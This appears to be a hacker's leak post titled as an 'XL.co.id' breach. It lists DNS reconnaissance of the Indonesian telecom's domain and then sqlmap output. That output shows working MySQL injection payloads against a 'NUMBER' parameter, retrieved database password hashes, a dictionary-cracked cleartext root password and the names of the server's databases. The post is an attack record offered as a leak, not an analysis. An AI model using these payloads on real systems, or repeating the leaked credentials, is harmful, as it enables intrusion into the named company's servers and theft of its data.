./nulsec leaked XL.co.id

1. [+] Getting nameservers
2. 112.215.37.183 - snbdc-dns2.xl.net.id
3. 202.152.254.245 - socrates.xl.net.id
4. 112.215.37.182 - snbdc-dns1.xl.net.id
5. 202.152.254.246 - hertz.xl.net.id
6. [-] Zone transfer failed
7.  
8. [+] IPv6 (AAAA) records found. Try running dnscan WITH the -6 OPTION.
9. 64:ff9b::ca98:e052
10.  
11. 64:ff9c::ca98:e052
12.  
13. [+] TXT records found
14. "MS=ms58499430"
15. "GcWtvXH+AYzV4ipe+0/Si1oaUaRK3weetfWln/QjMkrIQvzFUFq9QUlfMieX84hd4JAfkyfv+Y1bXCohqirTxQ=="
16. "v=spf1 mx:xl.co.id  ip4:208.74.204.5 ip4:208.74.204.9 include:spf.protection.outlook.com -all"
17.  
18. [+] MX records found, added TO target list
19. 50 mail3.xl.co.id.
20. 50 mail4.xl.co.id.
21. 10 mail1.xl.co.id.
22. 10 mail2.xl.co.id.
23.  
24. [*] Scanning xl.co.id FOR A records
25. 202.152.224.136 - webmail.xl.co.id              
26. 202.152.224.82 - xl.co.id
27. 202.152.224.82 - www.xl.co.id                
28. 202.152.254.245 - ns1.xl.co.id                    
29. 112.215.37.178 - ns2.xl.co.id
30. 202.152.224.82 - m.xl.co.id                      
31. 132.245.43.120 - autodiscover.xl.co.id    
32. 40.100.20.8 - autodiscover.xl.co.id
33. 40.100.16.24 - autodiscover.xl.co.id
34. 40.100.17.24 - autodiscover.xl.co.id
35. 132.245.254.88 - autodiscover.xl.co.id
36. 40.96.2.136 - autodiscover.xl.co.id
37. 40.100.0.200 - autodiscover.xl.co.id
38. 40.100.54.200 - autodiscover.xl.co.id
39. 132.245.69.40 - autodiscover.xl.co.id
40. 202.152.224.63 - mail2.xl.co.id              
41. 202.152.254.249 - www1.xl.co.id                
42. 202.152.254.249 - portal.xl.co.id          
43. 65.49.33.90 - video.xl.co.id
44. 112.215.105.11 - my.xl.co.id                  
45. 202.153.129.73 - wap.xl.co.id              
46. 202.152.224.8 - mail1.xl.co.id            
47. 202.152.224.29 - ads.xl.co.id                
48. 202.152.224.152 - apps.xl.co.id                    
49. 52.113.64.139 - sip.xl.co.id                
50. 202.152.224.137 - mail3.xl.co.id                
51. 52.112.66.14 - lyncdiscover.xl.co.id        
52. 112.215.105.53 - service.xl.co.id              
53. 202.152.224.82 - cloud.xl.co.id                
54. 112.215.81.228 - CONNECT.xl.co.id                          
55. 112.215.105.25 - speedtest.xl.co.id            
56. 202.152.254.249 - sso.xl.co.id                    
57. 202.152.224.138 - mail4.xl.co.id              
58. 13.67.50.225 - msoid.xl.co.id              
59. 23.100.112.64 - msoid.xl.co.id
60. 13.67.50.226 - msoid.xl.co.id
61. 202.152.224.30 - sslvpn.xl.co.id                
62. 202.152.224.135 - corp.xl.co.id            
63. 54.251.37.78 - love.xl.co.id                      
64. 202.152.224.60 - corporate.xl.co.id              
65. 202.152.224.91 - life.xl.co.id                      
66. 106.187.45.75 - ems.xl.co.id                        
67. 202.152.224.92 - play.xl.co.id                
68. 202.152.224.169 - mp.xl.co.id                      
69. 202.152.224.167 - ims.xl.co.id                    
70. 128.199.250.248 - wow.xl.co.id                        
71. 202.152.224.167 - youth.xl.co.id                  
72. 202.152.224.29 - ads2.xl.co.id                  
73. 202.152.224.183 - front.xl.co.id                
74. 23.92.53.225 - gm.xl.co.id                          
75. 202.152.224.162 - sipexternal.xl.co.id            
76. 112.215.105.11 - 123.xl.co.id                  
77. 54.255.130.217 - awards.xl.co.id                
78. 119.235.30.33 - csr.xl.co.id                      
79. 202.152.224.190 - ics.xl.co.id                  
80. 112.215.105.46 - bpm.xl.co.id                      
81. 112.215.105.62 - hc.xl.co.id                                  
82. 202.152.224.165 - failover.xl.co.id                          
83. 202.152.224.148 - test123.xl.co.id                          
84. 112.215.105.59 - smt.xl.co.id                        
85. 184.82.232.192 - east.xl.co.id                    
86. 202.152.224.192 - prm.xl.co.id                      
87. 202.153.129.73 - wap1.xl.co.id                      
88. 202.152.224.89 - spc.xl.co.id                        
89. 202.152.224.163 - rproxy.xl.co.id                    
90. 202.152.224.152 - tower.xl.co.id                    
91. 112.215.105.16 - ccp.xl.co.id                        
92. 202.152.224.196 - karaoke.xl.co.id                  
93. 202.152.224.222 - rbt.xl.co.id                        
94. 202.152.224.82 - m2m.xl.co.id                                
95. 202.152.224.76 - mbm.xl.co.id                              
96. 112.215.105.63 - registrasi.xl.co.id
97.  
98.  
99. Parameter: NUMBER (GET)
100.     TYPE: boolean-based blind
101.     Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY OR GROUP BY clause
102.     Payload: NUMBER=87829465777' RLIKE (SELECT (CASE WHEN (4494=4494) THEN 87829465777 ELSE 0x28 END)) AND 'QuLr'='QuLr&id=0
103.  
104.     TYPE: error-based
105.     Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY OR GROUP BY clause (FLOOR)
106.     Payload: NUMBER=87829465777' AND (SELECT 2323 FROM(SELECT COUNT(*),CONCAT(0x7171626271,(SELECT (ELT(2323=2323,1))),0x71627a7071,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND 'ZsEV'='ZsEV&id=0
107. ---
108. [15:10:01] [INFO] the back-END DBMS IS MySQL
109. web server operating system: Linux CentOS
110. web application technology: Apache 2.4.6, PHP 5.4.16
111. back-END DBMS: MySQL >= 5.0
112. [15:10:01] [INFO] fetching server hostname
113. [15:10:01] [INFO] resumed: xl1
114. hostname:    'xl1'
115. [15:10:01] [INFO] fetching DATABASE users password hashes
116. [15:10:01] [INFO] the SQL query used RETURNS 13 entries
117. [15:10:01] [INFO] retrieved: bubble
118. [15:10:01] [INFO] retrieved: *748C78DA84266E6825ADDF0887831A044D52CC0B
119. [15:10:01] [INFO] retrieved: root
120. [15:10:01] [INFO] retrieved: *748C78DA84266E6825ADDF0887831A044D52CC0B
121. [15:10:01] [INFO] retrieved: support
122. [15:10:01] [INFO] retrieved: *748C78DA84266E6825ADDF0887831A044D52CC0B
123. [15:10:01] [INFO] retrieved: root
124. [15:10:01] [INFO] retrieved:
125. [15:10:01] [INFO] retrieved: root
126. [15:10:01] [INFO] retrieved:
127. [15:10:01] [INFO] retrieved: support
128. [15:10:01] [INFO] retrieved: *748C78DA84266E6825ADDF0887831A044D52CC0B
129. [15:10:01] [INFO] retrieved: root
130. [15:10:01] [INFO] retrieved: *748C78DA84266E6825ADDF0887831A044D52CC0B
131. [15:10:02] [INFO] retrieved:
132. [15:10:02] [INFO] retrieved: *748C78DA84266E6825ADDF0887831A044D52CC0B
133. [15:10:02] [INFO] retrieved: bubble
134. [15:10:02] [INFO] retrieved: *13F84CC62636F799FE455B4B4BD45DB6C02F599B
135. [15:10:02] [INFO] retrieved: root
136. [15:10:02] [INFO] retrieved: *13F84CC62636F799FE455B4B4BD45DB6C02F599B
137. [15:10:02] [INFO] retrieved: support
138. [15:10:02] [INFO] retrieved: *13F84CC62636F799FE455B4B4BD45DB6C02F599B
139. [15:10:02] [INFO] retrieved:
140. [15:10:02] [INFO] retrieved: *894A0E091E1CD901CAEF2983002F13A99BCD6DC2
141. [15:10:02] [INFO] retrieved: root
142. [15:10:02] [INFO] retrieved: *894A0E091E1CD901CAEF2983002F13A99BCD6DC2
143. do you want TO store hashes TO a TEMPORARY file FOR eventual further processing WITH other tools [y/N] y
144. [15:10:04] [INFO] writing hashes TO a TEMPORARY file '/tmp/sqlmap1Gc3oR11142/sqlmaphashes-UcVruc.txt'
145. do you want TO perform a dictionary-based attack against retrieved password hashes? [Y/n/q]
146. [15:10:06] [INFO] USING hash method 'mysql_passwd'
147. what dictionary do you want TO USE?
148. [1] DEFAULT dictionary file '/root/.cache/sqlmap/txt/wordlist.zip' (press Enter)
149. [2] custom dictionary file
150. [3] file WITH list OF dictionary files
151. >
152. [15:10:07] [INFO] USING DEFAULT dictionary
153. do you want TO USE common password suffixes? (slow!) [y/N]
154. [15:10:09] [INFO] starting dictionary-based cracking (mysql_passwd)
155. [15:10:09] [INFO] starting 4 processes
156. [15:10:31] [INFO] cracked password 'support' FOR USER 'root'
157. DATABASE management system users password hashes:
158. [*] bubble [2]:
159.     password hash: *13F84CC62636F799FE455B4B4BD45DB6C02F599B
160.     clear-text password: support
161.     password hash: *748C78DA84266E6825ADDF0887831A044D52CC0B
162. [*] root [4]:
163.     password hash: *13F84CC62636F799FE455B4B4BD45DB6C02F599B
164.     clear-text password: support
165.     password hash: *748C78DA84266E6825ADDF0887831A044D52CC0B
166.     password hash: *894A0E091E1CD901CAEF2983002F13A99BCD6DC2
167.     password hash: NULL
168. [*] support [2]:
169.     password hash: *13F84CC62636F799FE455B4B4BD45DB6C02F599B
170.     clear-text password: support
171.     password hash: *748C78DA84266E6825ADDF0887831A044D52CC0B
172.  
173.  
174.  
175. [15:11:32] [INFO] the back-END DBMS IS MySQL
176. web server operating system: Linux CentOS
177. web application technology: Apache 2.4.6, PHP 5.4.16
178. back-END DBMS: MySQL >= 5.0
179. [15:11:32] [INFO] fetching CURRENT USER
180. [15:11:32] [INFO] retrieved: root@%
181. CURRENT USER:    'root@%'
182. [15:11:32] [INFO] fetching CURRENT DATABASE
183. [15:11:32] [INFO] retrieved: db_bblog
184. CURRENT DATABASE:    'db_bblog'
185. [15:11:32] [INFO] fetching server hostname
186. [15:11:32] [INFO] resumed: xl1
187. hostname:    'xl1'
188.  
189.  
190.  
191. available DATABASES [10]:
192. [*] backup
193. [*] db_bblog
194. [*] db_bcare
195. [*] db_bcore
196. [*] db_support
197. [*] information_schema
198. [*] mcurium
199. [*] mysql
200. [*] test
201. [*] web
202. 151.101.8.133